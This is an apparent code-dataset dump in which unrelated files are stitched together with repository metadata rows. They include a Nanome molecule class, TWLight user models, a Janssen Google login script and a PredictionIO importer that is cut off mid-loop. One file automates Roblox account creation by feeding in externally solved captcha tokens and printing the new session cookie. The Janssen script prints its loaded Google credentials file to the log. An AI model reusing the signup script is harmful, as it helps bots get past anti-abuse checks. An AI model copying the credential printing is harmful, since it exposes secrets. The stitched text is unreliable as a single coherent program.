cnts["dow"] = [datetime.date.fromisoformat(item).weekday() for item in cnts.index]
cnts["isodate"] = [datetime.date.fromisoformat(item) for item in cnts.index]
# write samples to consider in the PCA into a series of json files in the output directory
for cutoff_date in cnts.index:
dow = cnts.loc[cutoff_date, "dow"]
df_subset = df[df["sample_date"] < cutoff_date]
sample_ids = df_subset["sample_id"].to_list()
outputfile = os.path.join(outputdir, "{0}-{1}.pickle".format(dow, cutoff_date))
with open(outputfile, "wb") as f:
pickle.dump(sample_ids, f)
print(outputfile)
| 36.8 | 127 | 0.756144 | 647 | 4,232 | 4.829985 | 0.330757 | 0.03072 | 0.03584 | 0.0256 | 0.30272 | 0.2304 | 0.17536 | 0.15872 | 0.11872 | 0.10624 | 0 | 0.019068 | 0.132561 | 4,232 | 114 | 128 | 37.122807 | 0.832198 | 0.301276 | 0 | 0.228571 | 1 | 0 | 0.208787 | 0.085831 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.128571 | 0 | 0.128571 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57978560a0242c56700cc234e8aab484133ef169 | 11,740 | py | Python | nanome/api/structure/complex.py | nanome-ai/nanome | 7777a782168fe4e68f58c42f01cff9e66f3675aa | [
"MIT"
] | 1 | 2020-04-10T09:47:54.000Z | 2020-04-10T09:47:54.000Z | nanome/api/structure/complex.py | nanome-ai/nanome | 7777a782168fe4e68f58c42f01cff9e66f3675aa | [
"MIT"
] | 10 | 2019-05-30T18:29:10.000Z | 2020-02-15T02:16:42.000Z | nanome/api/structure/complex.py | nanome-ai/nanome | 7777a782168fe4e68f58c42f01cff9e66f3675aa | [
"MIT"
] | 2 | 2020-02-04T02:56:21.000Z | 2020-04-25T20:05:16.000Z | from nanome._internal._structure._complex import _Complex
from nanome._internal import _PluginInstance
from nanome._internal._network import PluginNetwork
from nanome._internal._network._commands._callbacks import _Messages
from nanome.util import Matrix, Logs
from .io import ComplexIO
from . import Base
class Complex(_Complex, Base):
"""
| Represents a Complex that contains molecules.
"""
io = ComplexIO()
def __init__(self):
super(Complex, self).__init__()
self._rendering = Complex.Rendering(self)
self._molecular = Complex.Molecular(self)
self._transform = Complex.Transform(self)
self.io = ComplexIO(self)
def add_molecule(self, molecule):
"""
| Add a molecule to this complex
:param molecule: Molecule to add to the chain
:type molecule: :class:`~nanome.structure.Molecule`
"""
molecule.index = -1
self._add_molecule(molecule)
def remove_molecule(self, molecule):
"""
| Remove a molecule from this complex
:param molecule: Molecule to remove from the chain
:type molecule: :class:`~nanome.structure.Molecule`
"""
molecule.index = -1
self._remove_molecule(molecule)
# region Generators
@property
def molecules(self):
"""
| The list of molecules within this complex
"""
for molecule in self._molecules:
yield molecule
@molecules.setter
def molecules(self, molecule_list):
self._molecules = molecule_list
@property
def chains(self):
"""
| The list of chains within this complex
"""
for molecule in self.molecules:
for chain in molecule.chains:
yield chain
@property
def residues(self):
"""
| The list of residues within this complex
"""
for chain in self.chains:
for residue in chain.residues:
yield residue
@property
def atoms(self):
"""
| The list of atoms within this complex
"""
for residue in self.residues:
for atom in residue.atoms:
yield atom
@property
def bonds(self):
"""
| The list of bonds within this complex
"""
for residue in self.residues:
for bond in residue.bonds:
yield bond
# endregion
# region all fields
@property
def boxed(self):
"""
| Represents if this complex is boxed/bordered in Nanome.
:type: :class:`bool`
"""
return self._boxed
@boxed.setter
def boxed(self, value):
self._boxed = value
@property
def locked(self):
"""
| Represents if this complex is locked and unmovable in Nanome.
:type: :class:`bool`
"""
return self._locked
@locked.setter
def locked(self, value):
self._locked = value
if (value):
self._boxed = True
@property
def visible(self):
"""
| Represents if this complex is visible in Nanome.
:type: :class:`bool`
"""
return self._visible
@visible.setter
def visible(self, value):
self._visible = value
@property
def computing(self):
return self._computing
@computing.setter
def computing(self, value):
self._computing = value
@property
def current_frame(self):
"""
| Represents the current animation frame the complex is in.
:type: :class:`int`
"""
return self._current_frame
@current_frame.setter
def current_frame(self, value):
value = max(0, min(value, len(self._molecules) - 1))
self._current_frame = value
def set_current_frame(self, value):
self.current_frame = value
# returns true if the complex is selected on nanome.
def get_selected(self):
return self._selected
def get_all_selected(self):
for atom in self.atoms:
if not atom.selected:
return False
return True
def set_all_selected(self, value):
for atom in self.atoms:
atom.selected = value
def set_surface_needs_redraw(self):
self._surface_dirty = True
@property
def box_label(self):
"""
| Represents the label on the box surrounding the complex
:type: :class:`str`
"""
return self._box_label
@box_label.setter
def box_label(self, value):
self._box_label = value
@property
def name(self):
"""
| Represents the name of the complex
:type: :class:`str`
"""
return self._name
@name.setter
def name(self, value):
if type(value) is not str:
value = str(value)
self._name = value
@property
def index_tag(self):
return self._index_tag
@index_tag.setter
def index_tag(self, value):
self._index_tag = value
@property
def split_tag(self):
return self._split_tag
@split_tag.setter
def split_tag(self, value):
self._split_tag = value
@property
def full_name(self):
"""
| Represents the full name of the complex with its tags and name
:type: :class:`str`
"""
fullname = self._name
has_tag = False
if self._index_tag > 0:
fullname = fullname + " {" + str(self._index_tag)
has_tag = True
if self._split_tag is not None and len(self._split_tag) > 0:
if has_tag:
fullname = fullname + "-" + self._split_tag
else:
fullname = fullname + " {" + self._split_tag
has_tag = True
if has_tag:
fullname = fullname + "}"
return fullname
@full_name.setter
def full_name(self, value):
self._name = value
self._index_tag = 0
self._split_tag = ''
@property
def position(self):
"""
| Position of the complex
:type: :class:`~nanome.util.Vector3`
"""
return self._position
@position.setter
def position(self, value):
self._position = value
@property
def rotation(self):
"""
| Rotation of the complex
:type: :class:`~nanome.util.Quaternion`
"""
return self._rotation
@rotation.setter
def rotation(self, value):
self._rotation = value
@property
def remarks(self):
"""
| remarks section of the complex file
:type: :class: dict
"""
return self._remarks
@remarks.setter
def remarks(self, value):
self._remarks = value
def get_workspace_to_complex_matrix(self):
return self.get_complex_to_workspace_matrix().get_inverse()
def get_complex_to_workspace_matrix(self):
return Matrix.compose_transformation_matrix(self._position, self._rotation)
# endregion
def convert_to_conformers(self, force_conformers=None):
return self._convert_to_conformers(force_conformers)
def convert_to_frames(self):
return self._convert_to_frames()
def register_complex_updated_callback(self, callback):
self._complex_updated_callback = callback
_PluginInstance._hook_complex_updated(self.index, callback)
PluginNetwork._send(_Messages.hook_complex_updated, self.index, False)
def register_selection_changed_callback(self, callback):
self._selection_changed_callback = callback
_PluginInstance._hook_selection_changed(self.index, callback)
PluginNetwork._send(_Messages.hook_selection_changed, self.index, False)
@staticmethod
def align_origins(target_complex, *other_complexes):
for complex in other_complexes:
complex.position = target_complex.position.get_copy()
complex.rotation = target_complex.rotation.get_copy()
# region deprecated
@property
@Logs.deprecated()
def rendering(self):
return self._rendering
@property
@Logs.deprecated()
def molecular(self):
return self._molecular
@property
@Logs.deprecated()
def transform(self):
return self._transform
class Rendering(object):
def __init__(self, parent):
self.parent = parent
@property
def boxed(self):
return self.parent._boxed
@boxed.setter
def boxed(self, value):
self.parent.boxed = value
@property
def locked(self):
return self.parent.locked
@locked.setter
def locked(self, value):
self.parent.locked = value
if (value):
self.parent.boxed = True
@property
def visible(self):
return self.parent.visible
@visible.setter
def visible(self, value):
self.parent.visible = value
@property
def computing(self):
return self.parent.computing
@computing.setter
def computing(self, value):
self.parent.computing = value
@property
def current_frame(self):
return self.parent.current_frame
@current_frame.setter
def current_frame(self, value):
self.parent.current_frame = value
# returns true if the complex is selected on nanome.
def get_selected(self):
return self.parent.selected
def set_surface_needs_redraw(self):
self.parent.surface_dirty = True
        @property
        def box_label(self):
            return self.parent.box_label
        @box_label.setter
        def box_label(self, value):
            self.parent.box_label = value
class Molecular(object):
def __init__(self, parent):
self.parent = parent
@property
def name(self):
return self.parent.name
@name.setter
def name(self, value):
self.parent.name = value
@property
def index_tag(self):
return self.parent.index_tag
@index_tag.setter
def index_tag(self, value):
self.parent.index_tag = value
@property
def split_tag(self):
return self.parent.split_tag
@split_tag.setter
def split_tag(self, value):
self.parent.split_tag = value
class Transform(object):
def __init__(self, parent):
self.parent = parent
@property
def position(self):
return self.parent.position
@position.setter
def position(self, value):
self.parent.position = value
@property
def rotation(self):
return self.parent.rotation
@rotation.setter
def rotation(self, value):
self.parent.rotation = value
def get_workspace_to_complex_matrix(self):
rotation = Matrix.from_quaternion(self.parent.rotation)
rotation.transpose()
translation = Matrix.identity(4)
translation[0][3] = -self.parent.position.x
translation[1][3] = -self.parent.position.y
translation[2][3] = -self.parent.position.z
transformation = rotation * translation
return transformation
def get_complex_to_workspace_matrix(self):
result = self.parent.get_workspace_to_complex_matrix()
result = result.get_inverse()
return result
# endregion
Complex.io._setup_addon(Complex)
_Complex._create = Complex
| 25.139186 | 83 | 0.593782 | 1,288 | 11,740 | 5.220497 | 0.120342 | 0.050565 | 0.044468 | 0.032719 | 0.492267 | 0.434563 | 0.383551 | 0.298037 | 0.170732 | 0.145152 | 0 | 0.001882 | 0.32121 | 11,740 | 466 | 84 | 25.193133 | 0.841887 | 0.123424 | 0 | 0.460208 | 0 | 0 | 0.000614 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.273356 | false | 0 | 0.024221 | 0.079585 | 0.442907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
579b07f7e2fa1f7d53a1230b84e41be5a5006de9 | 14,911 | py | Python | TWLight/users/models.py | Chinmay-Gurjar/TWLight | 94ff6e1bf0a8dd851e569c592608871de2ad3089 | [
"MIT"
] | null | null | null | TWLight/users/models.py | Chinmay-Gurjar/TWLight | 94ff6e1bf0a8dd851e569c592608871de2ad3089 | [
"MIT"
] | null | null | null | TWLight/users/models.py | Chinmay-Gurjar/TWLight | 94ff6e1bf0a8dd851e569c592608871de2ad3089 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
This file holds user profile information. (The base User model is part of
Django; profiles extend that with locally useful information.)
TWLight has three user types:
* editors
* coordinators
* site administrators.
_Editors_ are Wikipedia editors who are applying for TWL resource access
grants. We track some of their data here to facilitate access grant
decisions.
_Coordinators_ are the Wikipedians who have responsibility for evaluating
and deciding on access grants. Site administrators should add editors to the
Coordinators group through the Django admin site.
_Site administrators_ have admin privileges for this site. They have no special
handling in this file; they are handled through the native Django is_staff and
is_superuser flags, and site administrators have responsibility for designating
who has those flags through the admin site.
New users who sign up via oauth will be created as editors. Site administrators
may promote them to coordinators manually in the Django admin site, by adding
them to the coordinators group. They can also directly create Django user
accounts without attached Editors in the admin site, if for some reason it's
useful to have account holders without attached Wikipedia data.
"""
from datetime import datetime, timedelta
import json
import logging
import urllib2
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.utils.timezone import now
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
logger = logging.getLogger(__name__)
class UserProfile(models.Model):
"""
This is for storing data that relates only to accounts on TWLight, _not_ to
Wikipedia accounts. All TWLight users have user profiles.
"""
class Meta:
app_label = 'users'
        # Translators: This will probably only be displayed on admin-only pages.
verbose_name = 'user profile'
verbose_name_plural = 'user profiles'
# Related name for backwards queries defaults to "userprofile".
user = models.OneToOneField(settings.AUTH_USER_MODEL)
# Have they agreed to our terms?
terms_of_use = models.BooleanField(default=False,
# Translators: Users must agree to the website terms of use.
help_text=_("Has this user agreed with the terms of use?"))
terms_of_use_date = models.DateField(blank=True, null=True,
        # Translators: This field records the date the user agreed to the website terms of use.
help_text=_("The date this user agreed to the terms of use."))
# Translators: An option to set whether users email is copied to their website account from Wikipedia when logging in.
use_wp_email = models.BooleanField(default=True, help_text=_('Should we '
'automatically update their email from their Wikipedia email when they '
'log in? Defaults to True.'))
lang = models.CharField(max_length=128, null=True, blank=True,
choices=settings.LANGUAGES,
# Translators: Users' detected or selected language.
help_text=_("Language"))
# Create user profiles automatically when users are created.
def create_user_profile(sender, instance, created, **kwargs):
if created:
UserProfile.objects.create(user=instance)
models.signals.post_save.connect(create_user_profile,
sender=settings.AUTH_USER_MODEL)
class Editor(models.Model):
"""
This model is for storing data related to people's accounts on Wikipedia.
It is possible for users to have TWLight accounts and not have associated
editors (if the account was created via manage.py createsuperuser),
although some site functions will not be accessible.
"""
class Meta:
app_label = 'users'
        # Translators: Name of this model; probably only displayed on admin-only pages.
verbose_name = 'wikipedia editor'
verbose_name_plural = 'wikipedia editors'
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Internal data ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
# Database recordkeeping.
user = models.OneToOneField(settings.AUTH_USER_MODEL)
# Set as non-editable.
date_created = models.DateField(default=now,
editable=False,
# Translators: The date the user's profile was created on the website (not on Wikipedia).
help_text=_("When this profile was first created"))
# ~~~~~~~~~~~~~~~~~~~~~~~ Data from Wikimedia OAuth ~~~~~~~~~~~~~~~~~~~~~~~#
# Uses same field names as OAuth, but with wp_ prefixed.
# Data are current *as of the time of TWLight signup* but may get out of
# sync thereafter.
wp_username = models.CharField(max_length=235,
help_text=_("Username"))
# Translators: The total number of edits this user has made to all Wikipedia projects
wp_editcount = models.IntegerField(help_text=_("Wikipedia edit count"),
blank=True, null=True)
# Translators: The date this user registered their Wikipedia account
wp_registered = models.DateField(help_text=_("Date registered at Wikipedia"),
blank=True, null=True)
wp_sub = models.IntegerField(unique=True,
# Translators: The User ID for this user on Wikipedia
help_text=_("Wikipedia user ID")) # WP user id.
# Should we want to filter these to check for specific group membership or
# user rights in future:
# Editor.objects.filter(wp_groups__icontains=groupname) or similar.
# Translators: Lists the user groups (https://en.wikipedia.org/wiki/Wikipedia:User_access_levels) this editor has. e.g. Confirmed, Administrator, CheckUser
wp_groups = models.TextField(help_text=_("Wikipedia groups"),
blank=True)
# Translators: Lists the individual user rights permissions the editor has on Wikipedia. e.g. sendemail, createpage, move
wp_rights = models.TextField(help_text=_("Wikipedia user rights"),
blank=True)
wp_valid = models.BooleanField(default=False,
# Translators: Help text asking whether the user met the requirements for access (see https://wikipedialibrary.wmflabs.org/about/) the last time they logged in (when their information was last updated).
help_text=_('At their last login, did this user meet the criteria in '
'the terms of use?'))
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~ User-entered data ~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributions = models.TextField(
# Translators: Describes information added by the user to describe their Wikipedia edits.
help_text=_("Wiki contributions, as entered by user"),
blank=True)
# Fields we may, or may not, have collected in the course of applications
# for resource grants.
# **** SENSITIVE USER DATA AHOY. ****
real_name = models.CharField(max_length=128, blank=True)
country_of_residence = models.CharField(max_length=128, blank=True)
occupation = models.CharField(max_length=128, blank=True)
affiliation = models.CharField(max_length=128, blank=True)
@cached_property
def wp_user_page_url(self):
url = u'{base_url}/User:{self.wp_username}'.format(
base_url=settings.TWLIGHT_OAUTH_PROVIDER_URL, self=self)
return url
@cached_property
def wp_talk_page_url(self):
url = u'{base_url}/User_talk:{self.wp_username}'.format(
base_url=settings.TWLIGHT_OAUTH_PROVIDER_URL, self=self)
return url
@cached_property
def wp_email_page_url(self):
url = u'{base_url}/Special:EmailUser/{self.wp_username}'.format(
base_url=settings.TWLIGHT_OAUTH_PROVIDER_URL, self=self)
return url
@cached_property
def wp_link_guc(self):
url = u'{base_url}?user={self.wp_username}'.format(
base_url='https://tools.wmflabs.org/guc/',
self=self
)
return url
@cached_property
def wp_link_central_auth(self):
url = u'{base_url}&target={self.wp_username}'.format(
base_url='https://meta.wikimedia.org/w/index.php?title=Special%3ACentralAuth',
self=self
)
return url
@property
def get_wp_rights_display(self):
"""
This should be used to display wp_rights in a template, or any time
we need to manipulate the rights as a list rather than a string.
Doesn't exist for batch loaded users.
"""
        if self.wp_rights:
            return json.loads(self.wp_rights)
        else:
            return None
@property
def get_wp_groups_display(self):
"""
As above, but for groups.
"""
if self.wp_groups:
return json.loads(self.wp_groups)
else:
return None
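The two display properties above assume that `wp_rights` and `wp_groups` hold JSON-encoded lists, written with `json.dumps` at login time (see `update_from_wikipedia` below) and decoded with `json.loads` for templates. A standalone illustration of that round trip:

```python
import json

# A list such as OAuth returns for "groups"; the model stores it as JSON text.
wp_groups = json.dumps(["autoconfirmed", "sysop"])
assert isinstance(wp_groups, str)

# The display property decodes the stored text back into a list for templates.
print(json.loads(wp_groups))  # ['autoconfirmed', 'sysop']
```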
def _is_user_valid(self, identity, global_userinfo):
"""
Check for the eligibility criteria laid out in the terms of service.
To wit, users must:
* Have >= 500 edits
* Be active for >= 6 months
* Have Special:Email User enabled
* Not be blocked on any projects
Note that we won't prohibit signups or applications on this basis.
Coordinators have discretion to approve people who are near the cutoff.
Furthermore, editors who are active on multiple wikis may meet this
minimum when their account activity is aggregated even if they do not
meet it on their home wiki - but we can only check the home wiki.
"""
try:
# Check: >= 500 edits
assert int(global_userinfo['editcount']) >= 500
# Check: registered >= 6 months ago
# Try oauth registration date first. If it's not valid, try the global_userinfo date
try:
reg_date = datetime.strptime(identity['registered'], '%Y%m%d%H%M%S').date()
            except (KeyError, TypeError, ValueError):
reg_date = datetime.strptime(global_userinfo['registration'], '%Y-%m-%dT%H:%M:%SZ').date()
assert datetime.today().date() - timedelta(days=182) >= reg_date
# Check: not blocked
assert identity['blocked'] == False
return True
# Was assertion error, now we're catching any error in case we have
# an API communication or data problem.
except:
logger.exception('Editor was not valid.')
return False
def get_global_userinfo(self, identity):
"""
        Grab global user information from the API, which we'll use to overlay
        some local wiki user info returned by OAuth. Returns a dict like:
global_userinfo:
home: "zhwikisource"
id: 27666025
registration: "2013-05-05T16:00:09Z"
name: "Example"
editcount: 10
"""
try:
            endpoint = ('{base}/w/api.php?action=query&meta=globaluserinfo'
                        '&guiuser={username}&guiprop=editcount'
                        '&format=json&formatversion=2').format(
                base=identity['iss'],
                username=urllib2.quote(identity['username'].encode('utf8')))
results = json.loads(urllib2.urlopen(endpoint).read())
global_userinfo = results['query']['globaluserinfo']
try:
assert 'missing' not in global_userinfo
logger.info('Fetched global_userinfo for User.')
return global_userinfo
except AssertionError:
logger.exception('Could not fetch global_userinfo for User.')
return None
except:
logger.exception('Could not fetch global_userinfo for User.')
return None
def update_from_wikipedia(self, identity, lang):
"""
Given the dict returned from the Wikipedia OAuth /identify endpoint,
update the instance accordingly.
This assumes that we have used wp_sub to match the Editor and the
Wikipedia info.
Expected identity data:
{
'username': identity['username'], # wikipedia username
'sub': identity['sub'], # wikipedia ID
'rights': identity['rights'], # user rights on-wiki
'groups': identity['groups'], # user groups on-wiki
'editcount': identity['editcount'],
'email': identity['email'],
# Date registered: YYYYMMDDHHMMSS
'registered': identity['registered']
}
We could attempt to harvest real name, but we won't; we'll let
users enter it if required by partners, and avoid knowing the
data otherwise.
"""
try:
assert self.wp_sub == identity['sub']
except AssertionError:
logger.exception('Was asked to update Editor data, but the '
'WP sub in the identity passed in did not match the wp_sub on '
'the instance. Not updating.')
raise
global_userinfo = self.get_global_userinfo(identity)
self.wp_username = identity['username']
self.wp_rights = json.dumps(identity['rights'])
self.wp_groups = json.dumps(identity['groups'])
if global_userinfo:
self.wp_editcount = global_userinfo['editcount']
# Try oauth registration date first. If it's not valid, try the global_userinfo date
try:
reg_date = datetime.strptime(identity['registered'], '%Y%m%d%H%M%S').date()
        except (TypeError, ValueError):
try:
reg_date = datetime.strptime(global_userinfo['registration'], '%Y-%m-%dT%H:%M:%SZ').date()
            except (TypeError, ValueError):
                reg_date = None
self.wp_registered = reg_date
self.wp_valid = self._is_user_valid(identity, global_userinfo)
self.save()
# This will be True the first time the user logs in, since use_wp_email
# defaults to True. Therefore we will initialize the email field if
# they have an email at WP for us to initialize it with.
if self.user.userprofile.use_wp_email:
try:
self.user.email = identity['email']
except KeyError:
# Email isn't guaranteed to be present in identity - don't do
# anything if we can't find it.
logger.exception('Unable to get Editor email address from Wikipedia.')
pass
self.user.save()
# Add language if the user hasn't selected one
if not self.user.userprofile.lang:
self.user.userprofile.lang = lang
self.user.userprofile.save()
def __unicode__(self):
return _(u'{wp_username}').format(
# Translators: Do not translate.
wp_username=self.wp_username)
def get_absolute_url(self):
return reverse('users:editor_detail', kwargs={'pk': self.pk})
# --- Exercicios Python/exlista01.py (repo: oswaldo-spadari/Python-Exec, license: MIT) ---

# Write a program that reads a list of 5 integers and displays them.
lista=[]
for i in range(1, 6):
    lista.append(int(input('Enter a number: ')))
print(lista)
# --- jans-linux-setup/jans_setup/static/extension/person_authentication/GoogleExternalAuthenticator.py (repo: nikdavnik/jans, license: Apache-2.0) ---

# Janssen Project software is available under the Apache 2.0 License (2004). See http://www.apache.org/licenses/ for full text.
# Copyright (c) 2020, Janssen Project
#
# Author: Madhumita Subramaniam
#
from io.jans.service.cdi.util import CdiUtil
from io.jans.as.server.security import Identity
from io.jans.model.custom.script.type.auth import PersonAuthenticationType
from io.jans.as.server.service import AuthenticationService, UserService
from io.jans.util import StringHelper
from io.jans.as.server.util import ServerUtil
from io.jans.as.common.model.common import User
from io.jans.orm import PersistenceEntryManager
from io.jans.as.persistence.model.configuration import GluuConfiguration
from java.math import BigInteger
from java.security import SecureRandom
import java
import sys
import json
from java.util import Collections, HashMap, HashSet, ArrayList, Arrays, Date
from com.google.api.client.googleapis.auth.oauth2 import GoogleIdToken
from com.google.api.client.googleapis.auth.oauth2.GoogleIdToken import Payload
from com.google.api.client.googleapis.auth.oauth2 import GoogleIdTokenVerifier
from com.google.api.client.http.javanet import NetHttpTransport
from com.google.api.client.json.jackson2 import JacksonFactory
class PersonAuthentication(PersonAuthenticationType):
def __init__(self, currentTimeMillis):
self.currentTimeMillis = currentTimeMillis
def init(self, customScript, configurationAttributes):
print "Google. Initialization"
google_creds_file = configurationAttributes.get("google_creds_file").getValue2()
# Load credentials from file
f = open(google_creds_file, 'r')
try:
data = json.loads(f.read())
print data
creds = data["web"]
print creds
except:
print "Google. Initialization. Failed to load creds from file:", google_creds_file
print "Exception: ", sys.exc_info()[1]
return False
finally:
f.close()
self.client_id = str(creds["client_id"])
self.project_id = str(creds["project_id"])
self.auth_uri = str(creds["auth_uri"])
self.token_uri = str(creds["token_uri"])
self.auth_provider_x509_cert_url = str(creds["auth_provider_x509_cert_url"])
self.redirect_uris = str(creds["redirect_uris"])
self.javascript_origins = str(creds["javascript_origins"])
print "Google. Initialized successfully"
return True
def destroy(self, configurationAttributes):
print "Google. Destroy"
print "Google. Destroyed successfully"
return True
def getAuthenticationMethodClaims(self, requestParameters):
return None
def getApiVersion(self):
return 11
def isValidAuthenticationMethod(self, usageType, configurationAttributes):
return True
def getAlternativeAuthenticationMethod(self, usageType, configurationAttributes):
return None
def authenticate(self, configurationAttributes, requestParameters, step):
authenticationService = CdiUtil.bean(AuthenticationService)
if (step == 1):
print "Google. Authenticate for step 1"
identity = CdiUtil.bean(Identity)
googleCred = ServerUtil.getFirstValue(requestParameters, "credential")
if googleCred is not None:
                googleIdToken = googleCred
google_Id = self.verifyIDToken(googleIdToken)
                # If the user doesn't exist in persistence, add them.
foundUser = self.findUserByGoogleId(google_Id)
if foundUser is None:
foundUser = User()
foundUser.setAttribute("jansExtUid", "passport-google:"+google_Id)
foundUser.setAttribute(self.getLocalPrimaryKey(),google_Id)
userService = CdiUtil.bean(UserService)
result = userService.addUser(foundUser, True)
foundUser = self.findUserByGoogleId(google_Id)
logged_in = authenticationService.authenticate(foundUser.getUserId())
return logged_in
else:
credentials = identity.getCredentials()
user_name = credentials.getUsername()
user_password = credentials.getPassword()
logged_in = False
if (StringHelper.isNotEmptyString(user_name) and StringHelper.isNotEmptyString(user_password)):
logged_in = authenticationService.authenticate(user_name, user_password)
return logged_in
else:
print "Google. Authenticate Error"
return False
def verifyIDToken(self, googleIdToken):
verifier = GoogleIdTokenVerifier.Builder(NetHttpTransport(), JacksonFactory()).setAudience(Collections.singletonList(self.client_id)).build()
# the GoogleIdTokenVerifier.verify() method verifies the JWT signature, the aud claim, the iss claim, and the exp claim.
idToken = verifier.verify(googleIdToken)
if idToken is not None:
payload = idToken.getPayload()
userId = payload.getSubject()
print "User ID: %s" % userId
#email = payload.getEmail()
#emailVerified = Boolean.valueOf(payload.getEmailVerified())
#name = str( payload.get("name"))
#pictureUrl = str(payload.get("picture"))
#locale = str( payload.get("locale"))
#familyName = str( payload.get("family_name"))
#givenName = str( payload.get("given_name"))
return userId
        else:
print "Invalid ID token."
return None
def findUserByGoogleId(self, googleId):
userService = CdiUtil.bean(UserService)
return userService.getUserByAttribute("jansExtUid", "passport-google:"+googleId)
def getLocalPrimaryKey(self):
entryManager = CdiUtil.bean(PersistenceEntryManager)
config = GluuConfiguration()
config = entryManager.find(config.getClass(), "ou=configuration,o=jans")
#Pick (one) attribute where user id is stored (e.g. uid/mail)
# primaryKey is the primary key on the backend AD / LDAP Server
# localPrimaryKey is the primary key on Gluu. This attr value has been mapped with the primary key attr of the backend AD / LDAP when configuring cache refresh
uid_attr = config.getIdpAuthn().get(0).getConfig().findValue("localPrimaryKey").asText()
print "Casa. init. uid attribute is '%s'" % uid_attr
return uid_attr
def prepareForStep(self, configurationAttributes, requestParameters, step):
if (step == 1):
print "Google. Prepare for Step 1"
identity = CdiUtil.bean(Identity)
identity.setWorkingParameter("gclient_id",self.client_id)
return True
else:
return False
def getExtraParametersForStep(self, configurationAttributes, step):
return None
def getCountAuthenticationSteps(self, configurationAttributes):
return 1
def getPageForStep(self, configurationAttributes, step):
if(step == 1):
return "/auth/google/login.xhtml"
return ""
def getNextStep(self, configurationAttributes, requestParameters, step):
return -1
def getLogoutExternalUrl(self, configurationAttributes, requestParameters):
print "Get external logout URL call"
return None
def logout(self, configurationAttributes, requestParameters):
return True
# --- example/sign up.py (repo: Roblox-Thot/captchaCodeMakerV2, license: Apache-2.0) ---

# This code could be improved, but it's just an example of how to use the code from the site.
import requests, base64, random, string
token = input("Put code here:\n")
headers = {
'authority': 'auth.roblox.com',
'dnt': '1',
'x-csrf-token': requests.post("https://auth.roblox.com/v2/login").headers["x-csrf-token"],
'sec-ch-ua-mobile': '?0',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36',
'content-type': 'application/json;charset=UTF-8',
'accept': 'application/json, text/plain, */*',
}
username = ''.join(random.choice(string.ascii_letters) for i in range(20))
tokens = base64.b64decode(token).decode('utf-8').split(',')
data = {
"username":username,
"password":username[::-1],
"birthday":"01 Oct 2003",
"gender":1,
"isTosAgreementBoxChecked":True,
"context":"MultiverseSignupForm",
"referralData":None,
"displayAvatarV2":False,
"displayContextV2":False,
"captchaId":tokens[0],
"captchaToken":tokens[1],
"captchaProvider":"PROVIDER_ARKOSE_LABS",
"agreementIds":["54d8a8f0-d9c8-4cf3-bd26-0cbf8af0bba3","848d8d8f-0e33-4176-bcd9-aa4e22ae7905"]
}
response = requests.post('https://auth.roblox.com/v2/signup', headers=headers, json=data)
# Debug
#print(response)
#print()
#print(response.text)
#print()
try:
cookie = response.cookies[".ROBLOSECURITY"]
print()
print(f'login: {username}:{username[::-1]}')
print(f'\nCookie:\n{cookie}')
    try:  # Tries to copy the cookie if pyperclip is installed
        import pyperclip
        pyperclip.copy(cookie)
    except Exception:
        pass
except KeyError:
    print("Failed to create")
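For illustration: the base64 `token` pasted into this script is decoded and split on a comma, and the pair is then sent as `captchaId` and `captchaToken`, so the expected input appears to be base64 of `"captchaId,captchaToken"` (an assumption inferred from the payload; the values below are made up). A minimal round trip of that encoding:

```python
import base64

# Hypothetical captcha values; real ones come from the captcha-solving site.
raw = "captcha-id-123,captcha-token-456"
token = base64.b64encode(raw.encode("utf-8")).decode("ascii")

# The same decode-and-split the script performs on the pasted token.
tokens = base64.b64decode(token).decode("utf-8").split(",")
print(tokens)  # ['captcha-id-123', 'captcha-token-456']
```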
# --- examples/experimental/scala-parallel-recommendation-entitymap/data/import_eventserver.py (repo: pferrel/incubator-predictionio, license: Apache-2.0) ---

#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Import sample data for recommendation engine
"""
import predictionio
import argparse
import random
SEED = 3
def import_events(client):
random.seed(SEED)
count = 0
print "Importing data..."
# generate 10 users, with user uid1,2,....,10
# with some random attributes
user_ids = [ ("uid"+str(i)) for i in range(1, 11)]
for user_id in user_ids:
print "Set user", user_id
client.create_event(
event="$set",
entity_type="user",
entity_id=user_id,
properties={
"attr0" : float(random.randint(0, 4)),
"attr1" : random.randint(10, 14),
"attr2" : random.randint(20, 24)
}
)
count += 1
# generate 50 items, with iid1,2,....,50
    # with some random attributes
item_ids = [ ("iid"+str(i)) for i in range(1, 51)]
for item_id in item_ids:
print "Set item", item_id
client.create_event(
event="$set",
entity_type="item",
entity_id=item_id,
properties={
"attrA" : random.choice(["something1", "something2", "valueX"]),
"attrB" : random.randint(10, 30),
"attrC" : random.choice([True, False])
}
)
count += 1
# each user randomly rate or buy 10 items
for user_id in user_ids:
